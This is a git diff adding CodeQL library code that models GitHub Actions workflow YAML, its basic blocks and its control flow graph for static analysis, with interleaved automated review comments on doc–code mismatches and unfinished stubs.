b/ql/lib/codeql/actions/ast/internal/Actions.qll 
@@ -0,0 +1,400 @@ +/** + * Libraries for modeling GitHub Actions workflow files written in YAML. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. + */ + +import codeql.actions.ast.internal.Yaml +import codeql.files.FileSystem + +// ALVARO: Make it private +/** + * Libraries for modeling GitHub Actions workflow files written in YAML. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. + */ +module Actions { + /** A YAML node in a GitHub Actions workflow or a custom composite action file. */ + private class Node extends YamlNode { + Node() { + exists(File f | + f = this.getLocation().getFile() and + ( + f.getRelativePath().regexpMatch("(^|.*/)\\.github/workflows/.*\\.ya?ml$") or + f.getBaseName() = ["action.yml", "action.yaml"] or + // ALVARO: Add any yaml files temporary for development + f.getExtension() = ["yml", "yaml"] + ) + ) + } + } + + /** + * A custom composite action. This is a mapping at the top level of an Actions YAML action file. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. + */ + class CompositeAction extends Node, YamlDocument, YamlMapping { + CompositeAction() { + this.getFile().getBaseName() = ["action.yml", "action.yaml"] and + this.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" + } + + /** Gets the `runs` mapping. */ + Runs getRuns() { result = this.lookup("runs") } + } + + /** + * An `runs` mapping in a custom composite action YAML. + * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs + */ + class Runs extends StepsContainer { + CompositeAction action; + + Runs() { action.lookup("runs") = this } + + /** Gets the action that this `runs` mapping is in. */ + CompositeAction getAction() { result = action } + + /** Gets the `using` mapping. 
*/ + Using getUsing() { result = this.lookup("using") } + } + + /** + * The parent class of the class that can contain `steps` mappings. (`Job` or `Runs` currently.) + */ + abstract class StepsContainer extends YamlNode, YamlMapping { + /** Gets the sequence of `steps` within this YAML node. */ + YamlSequence getSteps() { result = this.lookup("steps") } + } + + /** + * A `using` mapping in a custom composite action YAML. + */ + class Using extends YamlNode, YamlScalar { + Runs runs; + + Using() { runs.lookup("using") = this } + + /** Gets the `runs` mapping that this `using` mapping is in. */ + Runs getRuns() { result = runs } + } + + /** + * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. + */ + class Workflow extends Node, YamlDocument, YamlMapping { + /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ + YamlMapping getJobs() { result = this.lookup("jobs") } + + /** Gets the 'global' `env` mapping in this workflow. */ + WorkflowEnv getEnv() { result = this.lookup("env") } + + /** Gets the name of the workflow. */ + string getName() { result = this.lookup("name").(YamlString).getValue() } + + /** Gets the name of the workflow file. */ + string getFileName() { result = this.getFile().getBaseName() } + + /** Gets the `on:` in this workflow. */ + On getOn() { result = this.lookup("on") } + + /** Gets the job within this workflow with the given job ID. */ + Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } + } + + /** + * An Actions On trigger within a workflow. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#on. + */ + class On extends YamlNode, YamlMappingLikeNode { + Workflow workflow; + + On() { workflow.lookup("on") = this } + + /** Gets the workflow that this trigger is in. 
*/ + Workflow getWorkflow() { result = workflow } + } + + /** A common class for `env` in workflow, job or step. */ + abstract class Env extends YamlNode, YamlMapping { } + + /** A workflow level `env` mapping. */ + class WorkflowEnv extends Env { + Workflow workflow; + + WorkflowEnv() { workflow.lookup("env") = this } + + /** Gets the workflow this field belongs to. */ + Workflow getWorkflow() { result = workflow } + } + + /** A job level `env` mapping. */ + class JobEnv extends Env { + Job job; + + JobEnv() { job.lookup("env") = this } + + /** Gets the job this field belongs to. */ + Job getJob() { result = job } + } + + /** A step level `env` mapping. */ + class StepEnv extends Env { + Step step; + + StepEnv() { step.lookup("env") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } + } + + /** + * An Actions job within a workflow. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. + */ + class Job extends StepsContainer { + string jobId; + Workflow workflow; + + Job() { this = workflow.getJobs().lookup(jobId) } + + /** + * Gets the ID of this job, as a string. + * This is the job's key within the `jobs` mapping. + */ + string getId() { result = jobId } + + /** + * Gets the ID of this job, as a YAML scalar node. + * This is the job's key within the `jobs` mapping. + */ + YamlString getIdNode() { workflow.getJobs().maps(result, this) } + + /** Gets the human-readable name of this job, if any, as a string. */ + string getName() { result = this.getNameNode().getValue() } + + /** Gets the human-readable name of this job, if any, as a YAML scalar node. */ + YamlString getNameNode() { result = this.lookup("name") } + + /** Gets the step at the given index within this job. */ + Step getStep(int index) { result.getJob() = this and result.getIndex() = index } + + /** Gets the `env` mapping in this job. 
*/ + JobEnv getEnv() { result = this.lookup("env") } + + /** Gets the workflow this job belongs to. */ + Workflow getWorkflow() { result = workflow } + + /** Gets the value of the `if` field in this job, if any. */ + JobIf getIf() { result.getJob() = this } + + /** Gets the value of the `runs-on` field in this job. */ + JobRunson getRunsOn() { result.getJob() = this } + } + + /** + * An `if` within a job. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idif. + */ + class JobIf extends YamlNode, YamlScalar { + Job job; + + JobIf() { job.lookup("if") = this } + + /** Gets the step this field belongs to. */ + Job getJob() { result = job } + } + + /** + * A `runs-on` within a job. + * See https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idruns-on. + */ + class JobRunson extends YamlNode, YamlScalar { + Job job; + + JobRunson() { job.lookup("runs-on") = this } + + /** Gets the step this field belongs to. */ + Job getJob() { result = job } + } + + /** + * A step within an Actions job. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. + */ + class Step extends YamlNode, YamlMapping { + int index; + StepsContainer parent; + + Step() { this = parent.getSteps().getElement(index) } + + /** Gets the 0-based position of this step within the sequence of `steps`. */ + int getIndex() { result = index } + + /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ + Job getJob() { result = parent } + + /** Gets the `runs` this step belongs to, if the step belongs to a `runs` in a custom composite action. Has no result if the step belongs to a `job` in a workflow. */ + Runs getRuns() { result = parent } + + /** Gets the value of the `uses` field in this step, if any. 
*/ + Uses getUses() { result.getStep() = this } + + /** Gets the value of the `run` field in this step, if any. */ + Run getRun() { result.getStep() = this } + + /** Gets the value of the `if` field in this step, if any. */ + StepIf getIf() { result.getStep() = this } + + /** Gets the value of the `env` field in this step, if any. */ + StepEnv getEnv() { result = this.lookup("env") } + + /** Gets the ID of this step, if any. */ + string getId() { result = this.lookup("id").(YamlString).getValue() } + } + + /** + * An `if` within a step. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsif. + */ + class StepIf extends YamlNode, YamlScalar { + Step step; + + StepIf() { step.lookup("if") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } + } + + /** + * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. + * The capture groups are: + * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` + * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. + * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. + */ + private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } + + /** + * A `uses` field within an Actions job step, which references an action as a reusable unit of code. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsuses. + * + * For example: + * ``` + * uses: actions/checkout@v2 + * ``` + * + * Does not handle local repository references, e.g. `.github/actions/action-name`. + */ + class Uses extends YamlNode, YamlScalar { + Step step; + + Uses() { step.lookup("uses") = this } + + /** Gets the step this field belongs to. 
*/ + Step getStep() { result = step } + + /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ + string getGitHubRepository() { + result = + this.getValue().regexpCapture(usesParser(), 1) + "/" + + this.getValue().regexpCapture(usesParser(), 2) + } + + /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ + string getVersion() { result = this.getValue().regexpCapture(usesParser(), 3) } + } + + /** + * A `with` field within an Actions job step, which references an action as a reusable unit of code. + * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepswith. + * + * For example: + * ``` + * with: + * arg1: 1 + * arg2: abc + * ``` + */ + class With extends YamlNode, YamlMapping { + Step step; + + With() { step.lookup("with") = this } + + /** Gets the step this field belongs to. */ + Step getStep() { result = step } + } + + /** + * A `ref:` field within an Actions `with:` specific to `actions/checkout` action. + * + * For example: + * ``` + * uses: actions/checkout@v2 + * with: + * ref: ${{ github.event.pull_request.head.sha }} + * ``` + */ + class Ref extends YamlNode, YamlString { + With with; + + Ref() { with.lookup("ref") = this } + + /** Gets the `with` field this field belongs to. */ + With getWith() { result = with } + } + + /** + * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. + * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. 
+ * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} + */ + string getASimpleReferenceExpression(YamlString node) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + node.getValue() + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, _) + .regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + } + + /** Extracts the 'name' part from env.name */ + bindingset[name] + string getEnvName(string name) { result = name.regexpCapture("env\\.([A-Za-z0-9_]+)", 1) } + + /** + * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. + */ + class Run extends YamlNode, YamlString { + Step step; + + Run() { step.lookup("run") = this } + + /** Gets the step that executes this `run` command. */ + Step getStep() { result = step } + } + + /** + * ALVARO + * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds + */ + class Needs extends YamlNode { + Job job; + + Needs() { job.lookup("needs") = this } + + Job getJob() { result = job } + + Job getANeededJob() { + if this instanceof YamlString + then result.getId() = this.(YamlString).getValue() and result.getFile() = job.getFile() + else + if this instanceof YamlSequence + then + result.getId() = this.(YamlSequence).getElementNode(_).(YamlString).getValue() and + result.getFile() = job.getFile() + else none() + } + } +} diff --git a/ql/lib/codeql/actions/ast/internal/Yaml.qll b/ql/lib/codeql/actions/ast/internal/Yaml.qll new file mode 100644 index 000000000000..402ceae44ced --- /dev/null +++ b/ql/lib/codeql/actions/ast/internal/Yaml.qll 
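Review bot: The `Ref` class is documented as specific to the `actions/checkout` action, but its characteristic predicate `Ref() { with.lookup("ref") = this }` accepts the `ref:` key of any step's `with:` mapping, so either the comment or the constraint is wrong. If checkout-only is intended, add `and with.getStep().getUses().getGitHubRepository() = "actions/checkout"`; otherwise reword the comment to "A `ref:` field within an Actions `with:` mapping, as used for example by `actions/checkout`". The `Node` characteristic predicate also admits every `.yml`/`.yaml` file through the `f.getExtension() = ["yml", "yaml"]` disjunct, which the `ALVARO` comment already marks as temporary; until it is removed, any YAML file in the repository is modeled as an Actions node and results on non-workflow files should be treated as noise. In `getASimpleReferenceExpression` the second character class contains `\\((` where the first has `\\(`; the extra `(` is harmless inside a class but makes the two patterns differ for no reason and reads as a typo.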
@@ -0,0 +1,50 @@ +/** + * Provides classes for working with YAML data. + * + * YAML documents are represented as abstract syntax trees whose nodes + * are either YAML values or alias nodes referring to another YAML value. + */ + +private import codeql.yaml.Yaml as LibYaml + +private module YamlSig implements LibYaml::InputSig { + import codeql.Locations + + class LocatableBase extends @yaml_locatable { + Location getLocation() { yaml_locations(this, result) } + + string toString() { none() } + } + + class NodeBase extends LocatableBase, @yaml_node { + NodeBase getChildNode(int i) { yaml(result, _, this, i, _, _) } + + string getTag() { yaml(this, _, _, _, result, _) } + + string getAnchor() { yaml_anchors(this, result) } + + override string toString() { yaml(this, _, _, _, _, result) } + } + + class ScalarNodeBase extends NodeBase, @yaml_scalar_node { + int getStyle() { yaml_scalars(this, result, _) } + + string getValue() { yaml_scalars(this, _, result) } + } + + class CollectionNodeBase extends NodeBase, @yaml_collection_node { } + + class MappingNodeBase extends CollectionNodeBase, @yaml_mapping_node { } + + class SequenceNodeBase extends CollectionNodeBase, @yaml_sequence_node { } + + class AliasNodeBase extends NodeBase, @yaml_alias_node { + string getTarget() { yaml_aliases(this, result) } + } + + class ParseErrorBase extends LocatableBase, @yaml_error { + string getMessage() { yaml_errors(this, result) } + } +} + +import LibYaml::Make diff --git a/ql/lib/codeql/actions/controlflow/BasicBlocks.qll b/ql/lib/codeql/actions/controlflow/BasicBlocks.qll new file mode 100644 index 000000000000..cdc7b0cf24f1 --- /dev/null +++ b/ql/lib/codeql/actions/controlflow/BasicBlocks.qll 
@@ -0,0 +1,445 @@ +/** Provides classes representing basic blocks. */ + +private import codeql.actions.Cfg +private import codeql.actions.Ast +private import codeql.Locations + +/** + * A basic block, that is, a maximal straight-line sequence of control flow nodes + * without branches or joins. + */ +class BasicBlock extends TBasicBlockStart { + /** Gets the scope of this basic block. */ + final CfgScope getScope() { result = this.getFirstNode().getScope() } + + /** Gets an immediate successor of this basic block, if any. */ + BasicBlock getASuccessor() { result = this.getASuccessor(_) } + + /** Gets an immediate successor of this basic block of a given type, if any. */ + BasicBlock getASuccessor(SuccessorType t) { + result.getFirstNode() = this.getLastNode().getASuccessor(t) + } + + /** Gets an immediate predecessor of this basic block, if any. */ + BasicBlock getAPredecessor() { result.getASuccessor() = this } + + /** Gets an immediate predecessor of this basic block of a given type, if any. */ + BasicBlock getAPredecessor(SuccessorType t) { result.getASuccessor(t) = this } + + /** Gets the control flow node at a specific (zero-indexed) position in this basic block. */ + Node getNode(int pos) { bbIndex(this.getFirstNode(), result, pos) } + + /** Gets a control flow node in this basic block. */ + Node getANode() { result = this.getNode(_) } + + /** Gets the first control flow node in this basic block. */ + Node getFirstNode() { this = TBasicBlockStart(result) } + + /** Gets the last control flow node in this basic block. */ + Node getLastNode() { result = this.getNode(this.length() - 1) } + + /** Gets the length of this basic block. */ + int length() { result = strictcount(this.getANode()) } + + /** + * Holds if this basic block immediately dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block (which is an immediate + * predecessor of `bb`). 
+ * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 immediately dominates the + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate immediatelyDominates(BasicBlock bb) { bbIDominates(this, bb) } + + /** + * Holds if this basic block strictly dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block (which must be different + * from `bb`). + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 strictly dominates the + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate strictlyDominates(BasicBlock bb) { bbIDominates+(this, bb) } + + /** + * Holds if this basic block dominates basic block `bb`. + * + * That is, all paths reaching basic block `bb` from some entry point + * basic block must go through this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 dominates the basic + * basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block). + */ + predicate dominates(BasicBlock bb) { + bb = this or + this.strictlyDominates(bb) + } + + /** + * Holds if `df` is in the dominance frontier of this basic block. + * That is, this basic block dominates a predecessor of `df`, but + * does not dominate `df` itself. 
+ * + * Example: + * + * ```rb + * def m x + * if x < 0 + * x = -x + * if x > 10 + * x = x - 1 + * end + * end + * puts x + * end + * ``` + * + * The basic block on line 8 is in the dominance frontier + * of the basic block starting on line 3 because that block + * dominates the basic block on line 4, which is a predecessor of + * `puts x`. Also, the basic block starting on line 3 does not + * dominate the basic block on line 8. + */ + predicate inDominanceFrontier(BasicBlock df) { + this.dominatesPredecessor(df) and + not this.strictlyDominates(df) + } + + /** + * Holds if this basic block dominates a predecessor of `df`. + */ + private predicate dominatesPredecessor(BasicBlock df) { this.dominates(df.getAPredecessor()) } + + /** + * Gets the basic block that immediately dominates this basic block, if any. + * + * That is, all paths reaching this basic block from some entry point + * basic block must go through the result, which is an immediate basic block + * predecessor of this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * return 0 + * end + * return 1 + * end + * ``` + * + * The basic block starting on line 2 is an immediate dominator of + * the basic block on line 5 (all paths from the entry point of `m` + * to `return 1` must go through the `if` block, and the `if` block + * is an immediate predecessor of `return 1`). + */ + BasicBlock getImmediateDominator() { bbIDominates(result, this) } + + /** + * Holds if this basic block strictly post-dominates basic block `bb`. + * + * That is, all paths reaching a normal exit point basic block from basic + * block `bb` must go through this basic block (which must be different + * from `bb`). + * + * Example: + * + * ```rb + * def m b + * if b + * puts "b" + * end + * puts "m" + * end + * ``` + * + * The basic block on line 5 strictly post-dominates the basic block on + * line 3 (all paths to the exit point of `m` from `puts "b"` must go + * through `puts "m"`). 
+ */ + predicate strictlyPostDominates(BasicBlock bb) { bbIPostDominates+(this, bb) } + + /** + * Holds if this basic block post-dominates basic block `bb`. + * + * That is, all paths reaching a normal exit point basic block from basic + * block `bb` must go through this basic block. + * + * Example: + * + * ```rb + * def m b + * if b + * puts "b" + * end + * puts "m" + * end + * ``` + * + * The basic block on line 5 post-dominates the basic block on line 3 + * (all paths to the exit point of `m` from `puts "b"` must go through + * `puts "m"`). + */ + predicate postDominates(BasicBlock bb) { + this.strictlyPostDominates(bb) or + this = bb + } + + /** Holds if this basic block is in a loop in the control flow graph. */ + predicate inLoop() { this.getASuccessor+() = this } + + /** Gets a textual representation of this basic block. */ + string toString() { result = this.getFirstNode().toString() } + + /** Gets the location of this basic block. */ + Location getLocation() { result = this.getFirstNode().getLocation() } +} + +cached +private module Cached { + /** Internal representation of basic blocks. */ + cached + newtype TBasicBlock = TBasicBlockStart(Node cfn) { startsBB(cfn) } + + /** Holds if `cfn` starts a new basic block. */ + private predicate startsBB(Node cfn) { + not exists(cfn.getAPredecessor()) and exists(cfn.getASuccessor()) + or + cfn.isJoin() + or + cfn.getAPredecessor().isBranch() + or + /* + * In cases such as + * + * ```rb + * if x or y + * foo + * else + * bar + * ``` + * + * we have a CFG that looks like + * + * x --false--> [false] x or y --false--> bar + * \ | + * --true--> y --false-- + * \ + * --true--> [true] x or y --true--> foo + * + * and we want to ensure that both `foo` and `bar` start a new basic block, + * in order to get a `ConditionalBlock` out of the disjunction. + */ + + exists(cfn.getAPredecessor(any(BooleanSuccessor s))) + } + + /** + * Holds if `succ` is a control flow successor of `pred` within + * the same basic block. 
+ */ + private predicate intraBBSucc(Node pred, Node succ) { + succ = pred.getASuccessor() and + not startsBB(succ) + } + + /** + * Holds if `cfn` is the `i`th node in basic block `bb`. + * + * In other words, `i` is the shortest distance from a node `bb` + * that starts a basic block to `cfn` along the `intraBBSucc` relation. + */ + cached + predicate bbIndex(Node bbStart, Node cfn, int i) = + shortestDistances(startsBB/1, intraBBSucc/2)(bbStart, cfn, i) + + /** + * Holds if the first node of basic block `succ` is a control flow + * successor of the last node of basic block `pred`. + */ + private predicate succBB(BasicBlock pred, BasicBlock succ) { succ = pred.getASuccessor() } + + /** Holds if `dom` is an immediate dominator of `bb`. */ + cached + predicate bbIDominates(BasicBlock dom, BasicBlock bb) = + idominance(entryBB/1, succBB/2)(_, dom, bb) + + /** Holds if `pred` is a basic block predecessor of `succ`. */ + private predicate predBB(BasicBlock succ, BasicBlock pred) { succBB(pred, succ) } + + /** Holds if `bb` is an exit basic block that represents normal exit. */ + private predicate normalExitBB(BasicBlock bb) { bb.getANode().(AnnotatedExitNode).isNormal() } + + /** Holds if `dom` is an immediate post-dominator of `bb`. */ + cached + predicate bbIPostDominates(BasicBlock dom, BasicBlock bb) = + idominance(normalExitBB/1, predBB/2)(_, dom, bb) + + /** + * Gets the `i`th predecessor of join block `jb`, with respect to some + * arbitrary order. 
+ */ + cached + JoinBlockPredecessor getJoinBlockPredecessor(JoinBlock jb, int i) { + none() + /* + * result = + * rank[i + 1](JoinBlockPredecessor jbp | + * jbp = jb.getAPredecessor() + * | + * jbp order by JoinBlockPredecessors::getId(jbp), JoinBlockPredecessors::getSplitString(jbp) + * ) + */ + + } + + cached + predicate immediatelyControls(ConditionBlock cb, BasicBlock succ, BooleanSuccessor s) { + succ = cb.getASuccessor(s) and + forall(BasicBlock pred | pred = succ.getAPredecessor() and pred != cb | succ.dominates(pred)) + } + + cached + predicate controls(ConditionBlock cb, BasicBlock controlled, BooleanSuccessor s) { + exists(BasicBlock succ | cb.immediatelyControls(succ, s) | succ.dominates(controlled)) + } +} + +private import Cached + +/** Holds if `bb` is an entry basic block. */ +private predicate entryBB(BasicBlock bb) { bb.getFirstNode() instanceof EntryNode } + +/** + * An entry basic block, that is, a basic block whose first node is + * an entry node. + */ +class EntryBasicBlock extends BasicBlock { + EntryBasicBlock() { entryBB(this) } +} + +/** + * An annotated exit basic block, that is, a basic block whose last node is + * an annotated exit node. + */ +class AnnotatedExitBasicBlock extends BasicBlock { + private boolean normal; + + AnnotatedExitBasicBlock() { + exists(AnnotatedExitNode n | + n = this.getANode() and + if n.isNormal() then normal = true else normal = false + ) + } + + /** Holds if this block represent a normal exit. */ + final predicate isNormal() { normal = true } +} + +/** + * An exit basic block, that is, a basic block whose last node is + * an exit node. 
+ */ +class ExitBasicBlock extends BasicBlock { + ExitBasicBlock() { this.getLastNode() instanceof ExitNode } +} + +/* + * private module JoinBlockPredecessors { + * private predicate id(AstNode x, AstNode y) { x = y } + * + * private predicate idOf(AstNode x, int y) = equivalenceRelation(id/2)(x, y) + * + * int getId(JoinBlockPredecessor jbp) { + * idOf(Ast::toTreeSitter(jbp.getFirstNode().(AstCfgNode).getAstNode()), result) + * or + * idOf(Ast::toTreeSitter(jbp.(EntryBasicBlock).getScope()), result) + * } + * + * string getSplitString(JoinBlockPredecessor jbp) { + * result = jbp.getFirstNode().(AstCfgNode).getSplitsString() + * or + * not exists(jbp.getFirstNode().(AstCfgNode).getSplitsString()) and + * result = "" + * } + * } + */ + +/** A basic block with more than one predecessor. */ +class JoinBlock extends BasicBlock { + JoinBlock() { this.getFirstNode().isJoin() } + + /** + * Gets the `i`th predecessor of this join block, with respect to some + * arbitrary order. + */ + JoinBlockPredecessor getJoinBlockPredecessor(int i) { result = getJoinBlockPredecessor(this, i) } +} + +/** A basic block that is an immediate predecessor of a join block. */ +class JoinBlockPredecessor extends BasicBlock { + JoinBlockPredecessor() { this.getASuccessor() instanceof JoinBlock } +} + +/** A basic block that terminates in a condition, splitting the subsequent control flow. */ +class ConditionBlock extends BasicBlock { + ConditionBlock() { this.getLastNode().isCondition() } + + /** + * Holds if basic block `succ` is immediately controlled by this basic + * block with conditional value `s`. That is, `succ` is an immediate + * successor of this block, and `succ` can only be reached from + * the callable entry point by going via the `s` edge out of this basic block. 
+ */ + predicate immediatelyControls(BasicBlock succ, BooleanSuccessor s) { + immediatelyControls(this, succ, s) + } + + /** + * Holds if basic block `controlled` is controlled by this basic block with + * conditional value `s`. That is, `controlled` can only be reached from + * the callable entry point by going via the `s` edge out of this basic block. + */ + predicate controls(BasicBlock controlled, BooleanSuccessor s) { controls(this, controlled, s) } +} + diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll new file mode 100644 index 000000000000..8b6696fe777c --- /dev/null +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll 
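Review bot: `getJoinBlockPredecessor(JoinBlock jb, int i)` in the `Cached` module is stubbed with `none()` while its intended ranked implementation sits in a comment, so the public `JoinBlock.getJoinBlockPredecessor(int i)` never holds even though its doc comment promises the `i`th predecessor; either implement it or say so in the doc, e.g. `/** Not implemented yet: currently never holds (see the commented-out ranked body in the Cached module). */`. The example blocks in the dominance doc comments are Ruby snippets (```rb) inherited from the Ruby CFG library; in an Actions workflow library they describe constructs that do not exist here and should be replaced with a YAML job/step example or dropped. `AnnotatedExitBasicBlock` is documented as a block whose last node is an annotated exit node, but its constructor matches `n = this.getANode()`, so the doc and the predicate disagree on which node is required.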
@@ -0,0 +1,169 @@ +private import codeql.actions.Ast +private import codeql.controlflow.Cfg as CfgShared +private import codeql.Locations + +module Completion { + private newtype TCompletion = + TSimpleCompletion() or + TBooleanCompletion(boolean b) { b in [false, true] } or + TReturnCompletion() + + abstract class Completion extends TCompletion { + abstract string toString(); + + predicate isValidForSpecific(AstNode e) { none() } + + predicate isValidFor(AstNode e) { this.isValidForSpecific(e) } + + abstract SuccessorType getAMatchingSuccessorType(); + } + + abstract class NormalCompletion extends Completion { } + + class SimpleCompletion extends NormalCompletion, TSimpleCompletion { + override string toString() { result = "SimpleCompletion" } + + override predicate isValidFor(AstNode e) { not any(Completion c).isValidForSpecific(e) } + + override NormalSuccessor getAMatchingSuccessorType() { any() } + } + + class BooleanCompletion extends NormalCompletion, TBooleanCompletion { + boolean value; + + BooleanCompletion() { this = TBooleanCompletion(value) } + + override string toString() { result = "BooleanCompletion(" + value + ")" } + + override predicate isValidForSpecific(AstNode e) { + none() + // TODO: add support for conditional expressions? 
+ //e = any(ConditionalExpression c).getCondition() + } + + override BooleanSuccessor getAMatchingSuccessorType() { result.getValue() = value } + + final boolean getValue() { result = value } + } + + class ReturnCompletion extends Completion, TReturnCompletion { + override string toString() { result = "ReturnCompletion" } + + override predicate isValidForSpecific(AstNode e) { none() } + + override ReturnSuccessor getAMatchingSuccessorType() { any() } + } + + cached + private newtype TSuccessorType = + TNormalSuccessor() or + TBooleanSuccessor(boolean b) { b in [false, true] } or + TReturnSuccessor() + + class SuccessorType extends TSuccessorType { + string toString() { none() } + } + + class NormalSuccessor extends SuccessorType, TNormalSuccessor { + override string toString() { result = "successor" } + } + + class BooleanSuccessor extends SuccessorType, TBooleanSuccessor { + boolean value; + + BooleanSuccessor() { this = TBooleanSuccessor(value) } + + override string toString() { result = value.toString() } + + boolean getValue() { result = value } + } + + class ReturnSuccessor extends SuccessorType, TReturnSuccessor { + override string toString() { result = "return" } + } + // Why is there no conditional successor type? +} + +module CfgScope { + abstract class CfgScope extends AstNode { } + + private class JobScope extends CfgScope instanceof JobStmt { } +} + +private module Implementation implements CfgShared::InputSig { + import codeql.actions.Ast + import Completion + import CfgScope + + predicate completionIsNormal(Completion c) { not c instanceof ReturnCompletion } + + // Not using CFG splitting, so the following are just dummy types. 
+ private newtype TUnit = Unit() + + class SplitKindBase = TUnit; + + class Split extends TUnit { + abstract string toString(); + } + + predicate completionIsSimple(Completion c) { c instanceof SimpleCompletion } + + predicate completionIsValidFor(Completion c, AstNode e) { c.isValidFor(e) } + + CfgScope getCfgScope(AstNode e) { + exists(AstNode p | p = e.getParentNode() | + result = p + or + not p instanceof CfgScope and result = getCfgScope(p) + ) + } + + int maxSplits() { result = 0 } + + predicate scopeFirst(CfgScope scope, AstNode e) { first(scope.(JobStmt), e) } + + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { last(scope.(JobStmt), e, c) } + + predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } + + predicate successorTypeIsCondition(SuccessorType t) { t instanceof BooleanSuccessor } + + SuccessorType getAMatchingSuccessorType(Completion c) { result = c.getAMatchingSuccessorType() } + + predicate isAbnormalExitType(SuccessorType t) { none() } +} + +module CfgImpl = CfgShared::Make; + +private import CfgImpl +private import Completion +private import CfgScope + +// Trees are what end up creating Cfg::Node objects and therefore DataFlow::Node objects. +// Its also required that there is parent/child relationships between nodes so orphans nodes will not appear as either Cfg::Node or DataFlow::Node. +// For example +// - ArgumentExpr should be children of UsesExpr, and UsesExpr should be children of StepStmt. 
+// TODO: We need to make VarAccess expressions part ot the tree as they are currently orphans +private class CfgNodeTree extends StandardPreOrderTree instanceof AstNode { + override AstNode getChildNode(int i) { result = super.getChildNodeByOrder(i) } +} +// private class JobStmtTree extends StandardPreOrderTree instanceof JobStmt { +// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } +// } +// +// private class StepStmtTree extends StandardPreOrderTree instanceof StepStmt { +// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } +// } +// +// private class JobOutputTree extends StandardPreOrderTree instanceof JobOutputStmt { +// override ControlFlowTree getChildNode(int i) { result = super.getSuccNode(i) } +// } +// +// // TODO: Do we need this or we can just care about the ExprAccessExpr +// private class ArgumentTree extends LeafTree instanceof ArgumentExpr { } +// +// private class ExprAccessTree extends LeafTree instanceof ExprAccessExpr { } +// +// private class StepOutputAccessTree extends LeafTree instanceof StepOutputAccessExpr { } +// +// private class JobOutputAccessTree extends LeafTree instanceof JobOutputAccessExpr { } \ No newline at end of file diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll new file mode 100644 index 000000000000..5ce82a134ce6 --- /dev/null +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
